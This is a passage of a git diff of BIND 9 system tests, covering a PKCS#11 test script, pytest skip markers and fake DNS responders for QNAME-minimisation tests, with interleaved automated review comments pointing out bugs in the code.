count=$(grep -c "pkcs11-$alg-[kz]sk[0-9]*" "pkcs11-list.out.$alg" || true) + [ "$count" -eq 0 ] || ret=1 + test_done + n=$((n+1)) +done < supported + +echo_i "Checking if all supported algorithms were tested" +[ 
"$n" -eq "$(wc -l < supported)" ] || ret=1 +test_done + +echo_i "Checking for assertion failure in pk11_numbits()" +$PERL ../packet.pl -a "10.53.0.1" -p "$PORT" -t udp 2037-pk11_numbits-crash-test.pkt +dig_with_opts @10.53.0.1 version.bind. CH TXT > dig.out.pk11_numbits || ret=1 +test_done + +echo_i "exit status: $status" +[ "$status" -eq 0 ] || exit 1 diff --git a/bin/tests/system/pkcs11/usepkcs11 b/bin/tests/system/pkcs11/usepkcs11 new file mode 100644 index 0000000..ef46412 --- /dev/null +++ b/bin/tests/system/pkcs11/usepkcs11 @@ -0,0 +1 @@ +This test relies on PKCS#11! diff --git a/bin/tests/system/pytest_custom_markers.py b/bin/tests/system/pytest_custom_markers.py new file mode 100644 index 0000000..ba3a9d4 --- /dev/null +++ b/bin/tests/system/pytest_custom_markers.py 
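Review bot: With `set -e` in force, `count=$(grep -c "[0-9][[:space:]]*RRSIG" "$zonefile.signed")` ends the whole script when grep finds no match, because grep exits 1 and the assignment inherits that status; the `[ "$count" -eq 9 ] || ret=1` line and the final "exit status" report are then never reached. The other counting calls in this hunk already guard against this, so the line should read `count=$(grep -c "[0-9][[:space:]]*RRSIG" "$zonefile.signed" || true)`. The unchecked `$PERL ../packet.pl ... 2037-pk11_numbits-crash-test.pkt` call near the end has the same effect if the sender fails; `|| ret=1` there keeps the failure inside the test accounting.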
@@ -0,0 +1,60 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import os +import subprocess + +import pytest + + +long_test = pytest.mark.skipif( + not os.environ.get("CI_ENABLE_ALL_TESTS"), reason="CI_ENABLE_ALL_TESTS not set" +) + + +def feature_test(feature): + feature_test_bin = os.environ["FEATURETEST"] + try: + subprocess.run([feature_test_bin, feature], check=True) + except subprocess.CalledProcessError as exc: + if exc.returncode != 1: + raise + return False + return True + + +have_libxml2 = pytest.mark.skipif( + not feature_test("--have-libxml2"), reason="libxml2 support disabled in the build" +) + +have_json_c = pytest.mark.skipif( + not feature_test("--have-json-c"), reason="json-c support disabled in the build" +) + + +try: + import flaky as flaky_pkg +except ModuleNotFoundError: + # In case the flaky package is not installed, run the tests as usual + # without any attempts to re-run them. + # pylint: disable=unused-argument + def flaky(*args, **kwargs): + """Mock decorator that doesn't do anything special, just returns the function.""" + + def wrapper(wrapped_obj): + return wrapped_obj + + return wrapper + +else: + flaky = flaky_pkg.flaky diff --git a/bin/tests/system/qmin/ans2/ans.py b/bin/tests/system/qmin/ans2/ans.py new file mode 100755 index 0000000..1994ff3 --- /dev/null +++ b/bin/tests/system/qmin/ans2/ans.py 
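Review bot: `feature_test()` runs at import time, once for `have_libxml2` and once for `have_json_c`, and reads `os.environ["FEATURETEST"]` unconditionally, so importing this module without that variable set raises KeyError even for a test that only wants `long_test` or `flaky`. If that is intended, the function should say so; it has no docstring, and one such as `"""Run $FEATURETEST with FEATURE: True on exit 0, False on exit 1, any other failure is re-raised."""` would document the exit-code contract the `except` branch relies on. The `subprocess.run` call has no `timeout=`, so a hung feature-test binary stalls collection rather than failing it.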
@@ -0,0 +1,401 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns, dns.message, dns.query, dns.flags +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +def endswith(domain, labels): + return domain.endswith("." + labels) or domain == labels + + +############################################################################ +# Respond to a DNS query. +# For good. it serves: +# ns2.good. IN A 10.53.0.2 +# zoop.boing.good. NS ns3.good. +# ns3.good. IN A 10.53.0.3 +# too.many.labels.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.good. A 192.0.2.2 +# it responds properly (with NODATA empty response) to non-empty terminals +# +# For slow. it works the same as for good., but each response is delayed by 400 milliseconds +# +# For bad. it works the same as for good., but returns NXDOMAIN to non-empty terminals +# +# For ugly. it works the same as for good., but returns garbage to non-empty terminals +# +# For 1.0.0.2.ip6.arpa it serves +# 1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. IN PTR nee.com. +# 8.2.6.0.1.0.0.2.ip6.arpa IN NS ns3.good +# 1.0.0.2.ip6.arpa. IN NS ns2.good +# ip6.arpa. IN NS ns2.good +# +# For stale. it serves: +# a.b. NS ns.a.b.stale. +# ns.a.b.stale. IN A 10.53.0.3 +# b. NS ns.b.stale. 
+# ns.b.stale. IN A 10.53.0.4 +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + lqname = qname.lower() + labels = lqname.split(".") + + # get qtype + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + if typename == "A" or typename == "AAAA": + typename = "ADDR" + bad = False + ugly = False + slow = False + + # log this query + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, lqname)) + print("%s %s" % (typename, lqname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + + if endswith(lqname, "1.0.0.2.ip6.arpa."): + # Direct query - give direct answer + if endswith(lqname, "8.2.6.0.1.0.0.2.ip6.arpa."): + # Delegate to ns3 + r.authority.append( + dns.rrset.from_text( + "8.2.6.0.1.0.0.2.ip6.arpa.", 60, IN, NS, "ns3.good." + ) + ) + r.additional.append( + dns.rrset.from_text("ns3.good.", 60, IN, A, "10.53.0.3") + ) + elif ( + lqname + == "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa." + and rrtype == PTR + ): + # Direct query - give direct answer + r.answer.append( + dns.rrset.from_text( + "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa.", + 1, + IN, + PTR, + "nee.com.", + ) + ) + r.flags |= dns.flags.AA + elif lqname == "1.0.0.2.ip6.arpa." and rrtype == NS: + # NS query at the apex + r.answer.append( + dns.rrset.from_text("1.0.0.2.ip6.arpa.", 30, IN, NS, "ns2.good.") + ) + r.flags |= dns.flags.AA + elif endswith( + "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa.", + lqname, + ): + # NODATA answer + r.authority.append( + dns.rrset.from_text( + "1.0.0.2.ip6.arpa.", + 30, + IN, + SOA, + "ns2.good. hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + else: + # NXDOMAIN + r.authority.append( + dns.rrset.from_text( + "1.0.0.2.ip6.arpa.", + 30, + IN, + SOA, + "ns2.good. hostmaster.arpa. 
2018050100 1 1 1 1", + ) + ) + r.set_rcode(NXDOMAIN) + return r + elif endswith(lqname, "ip6.arpa."): + if lqname == "ip6.arpa." and rrtype == NS: + # NS query at the apex + r.answer.append(dns.rrset.from_text("ip6.arpa.", 30, IN, NS, "ns2.good.")) + r.flags |= dns.flags.AA + elif endswith("1.0.0.2.ip6.arpa.", lqname): + # NODATA answer + r.authority.append( + dns.rrset.from_text( + "ip6.arpa.", + 30, + IN, + SOA, + "ns2.good. hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + else: + # NXDOMAIN + r.authority.append( + dns.rrset.from_text( + "ip6.arpa.", + 30, + IN, + SOA, + "ns2.good. hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + r.set_rcode(NXDOMAIN) + return r + elif endswith(lqname, "stale."): + if endswith(lqname, "a.b.stale."): + # Delegate to ns.a.b.stale. + r.authority.append( + dns.rrset.from_text("a.b.stale.", 2, IN, NS, "ns.a.b.stale.") + ) + r.additional.append( + dns.rrset.from_text("ns.a.b.stale.", 2, IN, A, "10.53.0.3") + ) + elif endswith(lqname, "b.stale."): + # Delegate to ns.b.stale. + r.authority.append( + dns.rrset.from_text("b.stale.", 2, IN, NS, "ns.b.stale.") + ) + r.additional.append( + dns.rrset.from_text("ns.b.stale.", 2, IN, A, "10.53.0.4") + ) + elif lqname == "stale." and rrtype == NS: + # NS query at the apex. + r.answer.append(dns.rrset.from_text("stale.", 2, IN, NS, "ns2.stale.")) + r.flags |= dns.flags.AA + elif lqname == "stale." and rrtype == SOA: + # SOA query at the apex. + r.answer.append( + dns.rrset.from_text( + "stale.", 2, IN, SOA, "ns2.stale. hostmaster.stale. 1 2 3 4 5" + ) + ) + r.flags |= dns.flags.AA + elif lqname == "stale.": + # NODATA answer + r.authority.append( + dns.rrset.from_text( + "stale.", 2, IN, SOA, "ns2.stale. hostmaster.arpa. 1 2 3 4 5" + ) + ) + else: + # NXDOMAIN + r.authority.append( + dns.rrset.from_text( + "stale.", 2, IN, SOA, "ns2.stale. hostmaster.arpa. 1 2 3 4 5" + ) + ) + r.set_rcode(NXDOMAIN) + return r + elif endswith(lqname, "bad."): + bad = True + suffix = "bad." 
+ lqname = lqname[:-4] + elif endswith(lqname, "ugly."): + ugly = True + suffix = "ugly." + lqname = lqname[:-5] + elif endswith(lqname, "good."): + suffix = "good." + lqname = lqname[:-5] + elif endswith(lqname, "slow."): + slow = True + suffix = "slow." + lqname = lqname[:-5] + elif endswith(lqname, "fwd."): + suffix = "fwd." + lqname = lqname[:-4] + else: + r.set_rcode(REFUSED) + return r + + # Good/bad/ugly differs only in how we treat non-empty terminals + if endswith(lqname, "zoop.boing."): + r.authority.append( + dns.rrset.from_text("zoop.boing." + suffix, 1, IN, NS, "ns3." + suffix) + ) + elif ( + lqname == "many.labels.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z." + and rrtype == A + ): + r.answer.append(dns.rrset.from_text(lqname + suffix, 1, IN, A, "192.0.2.2")) + r.flags |= dns.flags.AA + elif lqname == "" and rrtype == NS: + r.answer.append(dns.rrset.from_text(suffix, 30, IN, NS, "ns2." + suffix)) + r.flags |= dns.flags.AA + elif lqname == "ns2." and rrtype == A: + r.answer.append(dns.rrset.from_text("ns2." + suffix, 30, IN, A, "10.53.0.2")) + r.flags |= dns.flags.AA + elif lqname == "ns2." and rrtype == AAAA: + r.answer.append( + dns.rrset.from_text("ns2." + suffix, 30, IN, AAAA, "fd92:7065:b8e:ffff::2") + ) + r.flags |= dns.flags.AA + elif lqname == "ns3." and rrtype == A: + r.answer.append(dns.rrset.from_text("ns3." + suffix, 30, IN, A, "10.53.0.3")) + r.flags |= dns.flags.AA + elif lqname == "ns3." and rrtype == AAAA: + r.answer.append( + dns.rrset.from_text("ns3." + suffix, 30, IN, AAAA, "fd92:7065:b8e:ffff::3") + ) + r.flags |= dns.flags.AA + elif lqname == "ns4." and rrtype == A: + r.answer.append(dns.rrset.from_text("ns4." + suffix, 30, IN, A, "10.53.0.4")) + r.flags |= dns.flags.AA + elif lqname == "ns4." and rrtype == AAAA: + r.answer.append( + dns.rrset.from_text("ns4." + suffix, 30, IN, AAAA, "fd92:7065:b8e:ffff::4") + ) + r.flags |= dns.flags.AA + elif lqname == "a.bit.longer.ns.name." 
and rrtype == A: + r.answer.append( + dns.rrset.from_text("a.bit.longer.ns.name." + suffix, 1, IN, A, "10.53.0.4") + ) + r.flags |= dns.flags.AA + elif lqname == "a.bit.longer.ns.name." and rrtype == AAAA: + r.answer.append( + dns.rrset.from_text( + "a.bit.longer.ns.name." + suffix, 1, IN, AAAA, "fd92:7065:b8e:ffff::4" + ) + ) + r.flags |= dns.flags.AA + else: + r.authority.append( + dns.rrset.from_text( + suffix, + 1, + IN, + SOA, + "ns2." + suffix + " hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + if bad or not ( + endswith("icky.icky.icky.ptang.zoop.boing.", lqname) + or endswith( + "many.labels.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.", + lqname, + ) + or endswith("a.bit.longer.ns.name.", lqname) + ): + r.set_rcode(NXDOMAIN) + if ugly: + r.set_rcode(FORMERR) + if slow: + time.sleep(0.2) + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. 
+############################################################################ +ip4 = "10.53.0.2" +ip6 = "fd92:7065:b8e:ffff::2" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) + +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket] +else: + input = [query4_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == query4_socket or s == query6_socket: + print( + "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" " + ) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + else: + print("NO RESPONSE") + if not running: + break diff --git a/bin/tests/system/qmin/ans3/ans.py b/bin/tests/system/qmin/ans3/ans.py new file mode 100755 index 0000000..079c3d2 --- /dev/null +++ b/bin/tests/system/qmin/ans3/ans.py 
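Review bot: The receive loop at the end of the file hands every datagram to `create_response()`, which calls `dns.message.from_wire(msg)` and indexes `m.question[0]` with no exception handling, so one malformed or question-less packet ends the responder with a traceback and the rest of the test run sees timeouts. Wrapping the call in a try/except that sets `rsp = None` would route such packets to the existing "NO RESPONSE" branch; the same loop appears in qmin/ans3/ans.py. The unused `logquery()` helper passes three arguments to `f.write` and would raise TypeError if it were ever called; `f.write("%s %s\n" % (type, qname))` is the fix, here and in the ans3 and ans4 copies. The header comment promises a 400 millisecond delay for slow., while this file executes `time.sleep(0.2)`.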
@@ -0,0 +1,274 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns, dns.message, dns.query, dns.flags +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +def endswith(domain, labels): + return domain.endswith("." + labels) or domain == labels + + +############################################################################ +# Respond to a DNS query. +# For good. it serves: +# zoop.boing.good. NS ns3.good. +# icky.ptang.zoop.boing.good. NS a.bit.longer.ns.name.good. +# it responds properly (with NODATA empty response) to non-empty terminals +# +# For slow. it works the same as for good., but each response is delayed by 400 milliseconds +# +# For bad. it works the same as for good., but returns NXDOMAIN to non-empty terminals +# +# For ugly. it works the same as for good., but returns garbage to non-empty terminals +# +# For stale. it serves: +# a.b.stale. 
IN TXT peekaboo (resolver did not do qname minimization) +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + lqname = qname.lower() + labels = lqname.split(".") + suffix = "" + + # get qtype + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + if typename == "A" or typename == "AAAA": + typename = "ADDR" + bad = False + ugly = False + slow = False + + # log this query + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, lqname)) + print("%s %s" % (typename, lqname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + + ip6req = False + + if endswith(lqname, "bad."): + bad = True + suffix = "bad." + lqname = lqname[:-4] + elif endswith(lqname, "ugly."): + ugly = True + suffix = "ugly." + lqname = lqname[:-5] + elif endswith(lqname, "good."): + suffix = "good." + lqname = lqname[:-5] + elif endswith(lqname, "slow."): + slow = True + suffix = "slow." + lqname = lqname[:-5] + elif endswith(lqname, "8.2.6.0.1.0.0.2.ip6.arpa."): + ip6req = True + elif endswith(lqname, "a.b.stale."): + if lqname == "a.b.stale.": + if rrtype == TXT: + # Direct query. + r.answer.append(dns.rrset.from_text(lqname, 1, IN, TXT, "peekaboo")) + r.flags |= dns.flags.AA + elif rrtype == NS: + # NS a.b. + r.answer.append(dns.rrset.from_text(lqname, 1, IN, NS, "ns.a.b.stale.")) + r.additional.append( + dns.rrset.from_text("ns.a.b.stale.", 1, IN, A, "10.53.0.3") + ) + r.flags |= dns.flags.AA + elif rrtype == SOA: + # SOA a.b. + r.answer.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 1 2 3 4 5" + ) + ) + r.flags |= dns.flags.AA + else: + # NODATA. + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 1 2 3 4 5" + ) + ) + else: + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 
1 2 3 4 5" + ) + ) + r.set_rcode(NXDOMAIN) + # NXDOMAIN. + return r + else: + r.set_rcode(REFUSED) + return r + + # Good/bad differs only in how we treat non-empty terminals + if lqname == "zoop.boing." and rrtype == NS: + r.answer.append( + dns.rrset.from_text(lqname + suffix, 1, IN, NS, "ns3." + suffix) + ) + r.flags |= dns.flags.AA + elif endswith(lqname, "icky.ptang.zoop.boing."): + r.authority.append( + dns.rrset.from_text( + "icky.ptang.zoop.boing." + suffix, + 1, + IN, + NS, + "a.bit.longer.ns.name." + suffix, + ) + ) + elif endswith("icky.ptang.zoop.boing.", lqname): + r.authority.append( + dns.rrset.from_text( + "zoop.boing." + suffix, + 1, + IN, + SOA, + "ns3." + suffix + " hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + if bad: + r.set_rcode(NXDOMAIN) + if ugly: + r.set_rcode(FORMERR) + elif endswith(lqname, "zoop.boing."): + r.authority.append( + dns.rrset.from_text( + "zoop.boing." + suffix, + 1, + IN, + SOA, + "ns3." + suffix + " hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + r.set_rcode(NXDOMAIN) + elif ip6req: + r.authority.append( + dns.rrset.from_text( + "1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", 60, IN, NS, "ns4.good." + ) + ) + r.additional.append(dns.rrset.from_text("ns4.good.", 60, IN, A, "10.53.0.4")) + else: + r.set_rcode(REFUSED) + + if slow: + time.sleep(0.4) + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. 
+############################################################################ +ip4 = "10.53.0.3" +ip6 = "fd92:7065:b8e:ffff::3" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) + +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket] +else: + input = [query4_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == query4_socket or s == query6_socket: + print( + "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" " + ) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + else: + print("NO RESPONSE") + if not running: + break diff --git a/bin/tests/system/qmin/ans4/ans.py b/bin/tests/system/qmin/ans4/ans.py new file mode 100755 index 0000000..f3d00c3 --- /dev/null +++ b/bin/tests/system/qmin/ans4/ans.py 
@@ -0,0 +1,320 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns, dns.message, dns.query, dns.flags +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +def endswith(domain, labels): + return domain.endswith("." + labels) or domain == labels + + +############################################################################ +# Respond to a DNS query. +# For good. it serves: +# icky.ptang.zoop.boing.good. NS a.bit.longer.ns.name. +# icky.icky.icky.ptang.zoop.boing.good. A 192.0.2.1 +# more.icky.icky.icky.ptang.zoop.boing.good. A 192.0.2.2 +# it responds properly (with NODATA empty response) to non-empty terminals +# +# For slow. it works the same as for good., but each response is delayed by 400 milliseconds +# +# For bad. it works the same as for good., but returns NXDOMAIN to non-empty terminals +# +# For ugly. it works the same as for good., but returns garbage to non-empty terminals +# +# For stale. it serves: +# a.b.stale. 
IN TXT hooray (resolver did do qname minimization) +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + lqname = qname.lower() + labels = lqname.split(".") + suffix = "" + + # get qtype + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + if typename == "A" or typename == "AAAA": + typename = "ADDR" + bad = False + slow = False + ugly = False + + # log this query + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, lqname)) + print("%s %s" % (typename, lqname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + + ip6req = False + + if endswith(lqname, "bad."): + bad = True + suffix = "bad." + lqname = lqname[:-4] + elif endswith(lqname, "ugly."): + ugly = True + suffix = "ugly." + lqname = lqname[:-5] + elif endswith(lqname, "good."): + suffix = "good." + lqname = lqname[:-5] + elif endswith(lqname, "slow."): + slow = True + suffix = "slow." + lqname = lqname[:-5] + elif endswith(lqname, "1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa."): + ip6req = True + elif endswith(lqname, "b.stale."): + if lqname == "a.b.stale.": + if rrtype == TXT: + # Direct query. + r.answer.append(dns.rrset.from_text(lqname, 1, IN, TXT, "hooray")) + r.flags |= dns.flags.AA + elif rrtype == NS: + # NS a.b. + r.answer.append(dns.rrset.from_text(lqname, 1, IN, NS, "ns.a.b.stale.")) + r.additional.append( + dns.rrset.from_text("ns.a.b.stale.", 1, IN, A, "10.53.0.3") + ) + r.flags |= dns.flags.AA + elif rrtype == SOA: + # SOA a.b. + r.answer.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 1 2 3 4 5" + ) + ) + r.flags |= dns.flags.AA + else: + # NODATA. + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "a.b.stale. hostmaster.a.b.stale. 1 2 3 4 5" + ) + ) + elif lqname == "b.stale.": + if rrtype == NS: + # NS b. 
+ r.answer.append(dns.rrset.from_text(lqname, 1, IN, NS, "ns.b.stale.")) + r.additional.append( + dns.rrset.from_text("ns.b.stale.", 1, IN, A, "10.53.0.4") + ) + r.flags |= dns.flags.AA + elif rrtype == SOA: + # SOA b. + r.answer.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "b.stale. hostmaster.b.stale. 1 2 3 4 5" + ) + ) + r.flags |= dns.flags.AA + else: + # NODATA. + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "b.stale. hostmaster.b.stale. 1 2 3 4 5" + ) + ) + else: + r.authority.append( + dns.rrset.from_text( + lqname, 1, IN, SOA, "b.stale. hostmaster.b.stale. 1 2 3 4 5" + ) + ) + r.set_rcode(NXDOMAIN) + # NXDOMAIN. + return r + else: + r.set_rcode(REFUSED) + return r + + # Good/bad differs only in how we treat non-empty terminals + if lqname == "icky.icky.icky.ptang.zoop.boing." and rrtype == A: + r.answer.append(dns.rrset.from_text(lqname + suffix, 1, IN, A, "192.0.2.1")) + r.flags |= dns.flags.AA + elif lqname == "more.icky.icky.icky.ptang.zoop.boing." and rrtype == A: + r.answer.append(dns.rrset.from_text(lqname + suffix, 1, IN, A, "192.0.2.2")) + r.flags |= dns.flags.AA + elif lqname == "icky.ptang.zoop.boing." and rrtype == NS: + r.answer.append( + dns.rrset.from_text( + lqname + suffix, 1, IN, NS, "a.bit.longer.ns.name." + suffix + ) + ) + r.flags |= dns.flags.AA + elif endswith(lqname, "icky.ptang.zoop.boing."): + r.authority.append( + dns.rrset.from_text( + "icky.ptang.zoop.boing." + suffix, + 1, + IN, + SOA, + "ns2." + suffix + " hostmaster.arpa. 2018050100 1 1 1 1", + ) + ) + if bad or not endswith("more.icky.icky.icky.ptang.zoop.boing.", lqname): + r.set_rcode(NXDOMAIN) + if ugly: + r.set_rcode(FORMERR) + elif ip6req: + r.flags |= dns.flags.AA + if ( + lqname + == "test1.test2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa." 
+ and rrtype == TXT + ): + r.answer.append( + dns.rrset.from_text( + "test1.test2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", + 1, + IN, + TXT, + "long_ip6_name", + ) + ) + elif endswith( + "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", + lqname, + ): + # NODATA answer + r.authority.append( + dns.rrset.from_text( + "1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", + 60, + IN, + SOA, + "ns4.good. hostmaster.arpa. 2018050100 120 30 320 16", + ) + ) + else: + # NXDOMAIN + r.authority.append( + dns.rrset.from_text( + "1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa.", + 60, + IN, + SOA, + "ns4.good. hostmaster.arpa. 2018050100 120 30 320 16", + ) + ) + r.set_rcode(NXDOMAIN) + else: + r.set_rcode(REFUSED) + + if slow: + time.sleep(0.4) + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. 
+############################################################################ +ip4 = "10.53.0.4" +ip6 = "fd92:7065:b8e:ffff::4" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) + +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket] +else: + input = [query4_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == query4_socket or s == query6_socket: + print( + "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" " + ) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + else: + print("NO RESPONSE") + if not running: + break diff --git a/bin/tests/system/qmin/clean.sh b/bin/tests/system/qmin/clean.sh new file mode 100644 index 0000000..172a423 --- /dev/null +++ b/bin/tests/system/qmin/clean.sh 
